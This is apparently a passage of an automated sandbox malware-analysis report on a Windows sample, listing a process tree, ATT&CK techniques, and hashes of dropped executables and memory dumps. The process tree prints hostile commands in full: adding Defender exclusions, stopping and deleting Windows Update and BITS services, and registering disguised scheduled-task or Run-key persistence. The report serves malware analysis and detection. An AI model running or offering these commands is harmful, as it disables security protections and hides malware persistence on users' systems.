- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1624
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3644
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1288
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3040
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2508
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3092
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:4040
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:400
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:4100
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:4900
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:4864
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5044
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:2140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1948

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1824

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1784

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
1⤵
PID:1660

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1528

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1356

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1244

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5076
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4024 -ip 4024
  2⤵
  PID:3348
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4476 -ip 4476
  2⤵
  PID:2864
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 544 -p 4248 -ip 4248
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:4348
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 540 -p 3232 -ip 3232
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:4208
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 588 -p 912 -ip 912
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:5100
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 572 -p 4100 -ip 4100
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:4408

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:2408

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:3136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3588

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:912
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 912 -s 368
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:2164

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4100
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4100 -s 484
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:1728

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8938.tmp.csv

Filesize
35KB

MD5
888f4e6cc4becda7bb00c0b384e47d70

SHA1
71045978a4100b8651761f47cd90063d6bfed274

SHA256
27e60a063e15cc60f55f05e8bcc6b8f10d4ee8270506331625e6967269e7f6e5

SHA512
08feb2645ad15e43e282a71ea26f96f3b90e87099ba38b5b59bda257fe9f6aa0671bad30872da94b1a49167014a6c1ca7af0411be37871262457db4db56e5b07

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8968.tmp.txt

Filesize
13KB

MD5
570e51828f199da88f1d13101d72dc65

SHA1
ffc54451cd7276d6851d80714e74e481d2330267

SHA256
6f8f9e67fefaf4d885730595cd2d2098db9bea56a392f62db45479b7aca5888b

SHA512
949fecd43bf19a4b8ed5bb2602c1de68e671609bb84994f5896b29cbe6d403086b4dc156c8c7b8d5ced0b8a3b6b89d7a60881f819ff84705a29c35ef6a64c502

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8F26.tmp.csv

Filesize
35KB

MD5
6b78bfeac5a371e917edc7f87b1c302a

SHA1
0f6d72874eaa954bbdd4e2c3836a03dafaf9d348

SHA256
db242ff0f6ca9643c9a76e43878baba63ead4ac5e6ff7b2030b75fcdaab6b87e

SHA512
9bfa89b675baa74ad3059bb11ff7dd905fa3a50f129b22af0c6e6860e69e86151c54a55ed78945850e92d465b7ba2c92a69521bd98afe9d11221b3504fb2664f

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8F65.tmp.txt

Filesize
13KB

MD5
77b5d60c57331858337d1073cd9a934b

SHA1
8723b1ef599038d6d01c764236fa0456225ceaeb

SHA256
8adaecfca544acdf52969f59e657a50214b2314d52596d9b50a278581746fc48

SHA512
629d368da4672ebbb37da0dd6f6a094a6017bb95b8a4c507a124580bc2c1816a6a2b6dba37646af15f0758a176890b6906c741aa926590d7c458e5e9ca6a98cf

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB3E3.tmp.csv

Filesize
38KB

MD5
d26f9d567a35075bd466d95cde404015

SHA1
9593efb1bfe5ef8c83fc1fae72ef5dca9fb93189

SHA256
9863edd7ef28f32c649a64554a1f225c80b1461cb765ebf63647a979c7fb92e6

SHA512
99709ccb981d918076730f8b33e32a6ec4fe3422f5ee8d79b21fc270cdbb8414a7781e45a455c702a727a9667e7a3d53f89983ac36294f40d92aa916027b4a23

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB422.tmp.txt

Filesize
13KB

MD5
cd91336fd384d2489911068f90493151

SHA1
c207671cae2db0ccc525357bf6a3650e2cda694a

SHA256
67ce0152d8d5d7f4db739c1557f0b1ffd80f8a7e51d7bcdae5e6fdbcc8a62b6c

SHA512
e65261f413b654c1b463d664b3ee45a6c4068b0497e982591290a3224868bd07dfd060597d76a228ebabfb8c03bc3000531600968b6ca09dbf27b7bf6cf0b304

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB58B.tmp.csv

Filesize
37KB

MD5
42e697cf7417fe05ca9cfc517c30ffe9

SHA1
cb5e9f38cc7e394fdad4172ba627578576718c0b

SHA256
a9e210a20a4e01a60bc9aef8eb09a4e708ffedcfe898c885bdbfd0bb38b89048

SHA512
7f3ed1ecd87895ab56281f6f13d6681506b5bb00d610f5c198aff3997dd264d996256c99ac7800e1035b2080bed1c8a81844abb0c8169af788f7a823060e6154

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB5CA.tmp.txt

Filesize
13KB

MD5
2f10cec8477b35d7bfc7bce2af15bdc2

SHA1
85a4a88d2678710f21db57c76618ec99d148e87b

SHA256
e486474a83c4283aecf6005b2882208a50bbb589e562af7cfb2e698245867377

SHA512
5edf705b0ed40c6179fff151973d58ad5293818629db1f3ceacf882e634f1b30dc0508a9e5cf9f67255f2df369f0f7f5de357e57a3cbc235b685e21bf4642d77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
00a283add99c722dc3771c571bf3a478

SHA1
03856f167b5f6b1a62cc3ab5c439eb302e9582f5

SHA256
d22aca6464911e4f578a0123566efbffb5b976a0306a895d0854217b43521c46

SHA512
bda44d4124008e4dfdefda010444fddf98f3754f9602eee7bff16c9f3910f47a4cad7d7dcb99eb06cbeac4c9750b4776e75f5b195593907fd9f0e769ad656b52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
a7ce8cefc3f798abe5abd683d0ef26dd

SHA1
b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e

SHA256
5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a

SHA512
c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.chk

Filesize
8KB

MD5
c5862b3713c9c805675de7856302f3dd

SHA1
db9c12c74a98ddeacc75d322327b60b7ffbf8c0e

SHA256
c2c38c55546139e7e50b9ffbeba15dc7c71a247e0d128d3a6b2c6f9700856f29

SHA512
a6ed4cb7b2d8ef3e50d4bb6d225be84458982adbdbf5770f5c6871acfff4d6a681b57a98be7cc2723eb161ac13bebd2d331477f67bbd0cae89aee1b9cab5ab00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.log

Filesize
512KB

MD5
2bb3fcccc102ed12917bf86c908b77d6

SHA1
63914af2b011902948529ce0bbba0379fe9fae03

SHA256
b513d4dd2d2d148b10a6ab774feba16797cf1d2ad7e764c2a491df78d9214699

SHA512
d548836c38b00721166133bb4a2d25e9e3e68eee9c65fe25f5f42bb32381d7464e4a337829789663b4077706add3e0086f12faddb885d2c465931673c320a00a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat

Filesize
14.0MB

MD5
9d29b6e777e0f8273073c13c60875eac

SHA1
f7c66403fc75ce8f14f06e836149de93105f730d

SHA256
deae7bd1c6f1d887e954551b61a415b841c2cc19ffc0557299c6605c4d1ba60e

SHA512
2cc570d0df757720d964ff59cf85bde9b02ad02ee03223fdc400f44dbdb5e122d64e59519abaf674450b403e2bc9febb8efab639a35adc3b9eccd95f6b664272

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm

Filesize
16KB

MD5
5be65483c4b1ba241643c68cff40c6ea

SHA1
fd974196de8f04aaad5f8380d59513a5f4f84861

SHA256
b1d63082a5e781a9a87a8111140e59e22a7d9da587c3e459cc23c80deaaa9f08

SHA512
f0d8bb5d6fa7fe7fa52e7875a6a5f9d3d1a4db5fc4173d2f8a0150d47f57e3b23cc96459281535a988db4e7509b5fc501700f8f9bcc484c511249fb2810ad664

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

Filesize
1.4MB

MD5
bb86a343080f9f4696c250ef31a18d9d

SHA1
43b2193dcb1d56eac73ba88a7b461822074192d6

SHA256
095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

SHA512
24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

Filesize
1.4MB

MD5
bb86a343080f9f4696c250ef31a18d9d

SHA1
43b2193dcb1d56eac73ba88a7b461822074192d6

SHA256
095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

SHA512
24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

Filesize
3.7MB

MD5
f5c51e7760315ad0f0238d268c03c60e

SHA1
85ebaaa9685634143a72bc82c6e7df87a78eed4c

SHA256
ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

SHA512
d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

Download Submit
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

Filesize
3.7MB

MD5
f5c51e7760315ad0f0238d268c03c60e

SHA1
85ebaaa9685634143a72bc82c6e7df87a78eed4c

SHA256
ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

SHA512
d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SysApp.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe

Filesize
674KB

MD5
e479ecb1802253a4c94767c8af306baf

SHA1
846bb5d88b91b8aa17bdb58eaf246b10e6586402

SHA256
b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679

SHA512
b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373

Download Submit
C:\Users\Admin\AppData\Local\Temp\new2.exe

Filesize
674KB

MD5
e479ecb1802253a4c94767c8af306baf

SHA1
846bb5d88b91b8aa17bdb58eaf246b10e6586402

SHA256
b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679

SHA512
b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
4ac8a26e2cee1347880edccb47ab30ea

SHA1
a629f6d453014c9dccb98987e1f4b0a3d4bdd460

SHA256
de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a

SHA512
fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a

Download Submit
memory/60-219-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/60-280-0x0000027870C00000-0x0000027870C27000-memory.dmp

Filesize
156KB

Download
memory/440-224-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/440-285-0x000001D729860000-0x000001D729887000-memory.dmp

Filesize
156KB

Download
memory/596-220-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/680-226-0x0000020794960000-0x0000020794981000-memory.dmp

Filesize
132KB

Download
memory/680-221-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/680-279-0x0000020794990000-0x00000207949B7000-memory.dmp

Filesize
156KB

Download
memory/700-225-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/700-287-0x000002512EEC0000-0x000002512EEE7000-memory.dmp

Filesize
156KB

Download
memory/776-263-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/816-165-0x0000000000070000-0x00000000001DC000-memory.dmp

Filesize
1.4MB

Download
memory/816-167-0x0000000004AB0000-0x0000000004B42000-memory.dmp

Filesize
584KB

Download
memory/816-171-0x0000000004F90000-0x0000000004F9A000-memory.dmp

Filesize
40KB

Download
memory/952-223-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/952-284-0x000001FF447D0000-0x000001FF447F7000-memory.dmp

Filesize
156KB

Download
memory/1036-227-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/1036-289-0x000001F0FA740000-0x000001F0FA767000-memory.dmp

Filesize
156KB

Download
memory/1056-228-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/1056-290-0x000002ADB2790000-0x000002ADB27B7000-memory.dmp

Filesize
156KB

Download
memory/1124-229-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/1124-293-0x000001C521930000-0x000001C521957000-memory.dmp

Filesize
156KB

Download
memory/1160-215-0x00007FFE4C820000-0x00007FFE4C8DE000-memory.dmp

Filesize
760KB

Download
memory/1160-210-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1160-218-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1160-214-0x00007FFE4DC70000-0x00007FFE4DE65000-memory.dmp

Filesize
2.0MB

Download
memory/1160-213-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1160-222-0x00007FFE4DC70000-0x00007FFE4DE65000-memory.dmp

Filesize
2.0MB

Download
memory/1200-230-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/1200-296-0x000001B080570000-0x000001B080597000-memory.dmp

Filesize
156KB

Download
memory/1232-299-0x000002143D3B0000-0x000002143D3D7000-memory.dmp

Filesize
156KB

Download
memory/1232-231-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/1244-300-0x000001B6CE850000-0x000001B6CE877000-memory.dmp

Filesize
156KB

Download
memory/1244-232-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/1356-302-0x000002B657F50000-0x000002B657F77000-memory.dmp

Filesize
156KB

Download
memory/1356-233-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/1404-234-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/1404-303-0x000001BC59360000-0x000001BC59387000-memory.dmp

Filesize
156KB

Download
memory/1436-235-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/1436-306-0x00000235C1780000-0x00000235C17A7000-memory.dmp

Filesize
156KB

Download
memory/1452-236-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/1452-307-0x0000026315990000-0x00000263159B7000-memory.dmp

Filesize
156KB

Download
memory/1528-309-0x000002679F6B0000-0x000002679F6D7000-memory.dmp

Filesize
156KB

Download
memory/1528-237-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/1604-238-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/1604-310-0x000001AA16920000-0x000001AA16947000-memory.dmp

Filesize
156KB

Download
memory/1624-176-0x000001CBD2670000-0x000001CBD2692000-memory.dmp

Filesize
136KB

Download
memory/1624-178-0x00007FFE2EB30000-0x00007FFE2F5F1000-memory.dmp

Filesize
10.8MB

Download
memory/1624-179-0x00007FFE2EB30000-0x00007FFE2F5F1000-memory.dmp

Filesize
10.8MB

Download
memory/1644-239-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/1644-311-0x000001FB58460000-0x000001FB58487000-memory.dmp

Filesize
156KB

Download
memory/1660-312-0x0000025AE9EF0000-0x0000025AE9F17000-memory.dmp

Filesize
156KB

Download
memory/1660-240-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/1676-241-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/1784-242-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/1824-245-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/1940-243-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/1948-244-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/1980-246-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/1996-248-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/2036-247-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/2108-250-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/2144-249-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/2276-203-0x0000000004C60000-0x0000000004C9C000-memory.dmp

Filesize
240KB

Download
memory/2276-199-0x00000000051C0000-0x00000000057D8000-memory.dmp

Filesize
6.1MB

Download
memory/2276-201-0x0000000004D30000-0x0000000004E3A000-memory.dmp

Filesize
1.0MB

Download
memory/2276-186-0x00000000001E0000-0x0000000000200000-memory.dmp

Filesize
128KB

Download
memory/2276-200-0x0000000004C00000-0x0000000004C12000-memory.dmp

Filesize
72KB

Download
memory/2348-251-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/2360-252-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/2472-253-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/2484-254-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/2496-256-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/2656-255-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/2668-258-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/2708-257-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/2760-261-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/2768-259-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/2776-260-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/3044-262-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/3396-264-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/3716-265-0x00007FFE0DCF0000-0x00007FFE0DD00000-memory.dmp

Filesize
64KB

Download
memory/3980-150-0x00000000073A0000-0x0000000007A1A000-memory.dmp

Filesize
6.5MB

Download
memory/3980-146-0x0000000005A50000-0x0000000005A6E000-memory.dmp

Filesize
120KB

Download
memory/3980-141-0x0000000000CB0000-0x0000000000CE6000-memory.dmp

Filesize
216KB

Download
memory/3980-142-0x0000000004C50000-0x0000000005278000-memory.dmp

Filesize
6.2MB

Download
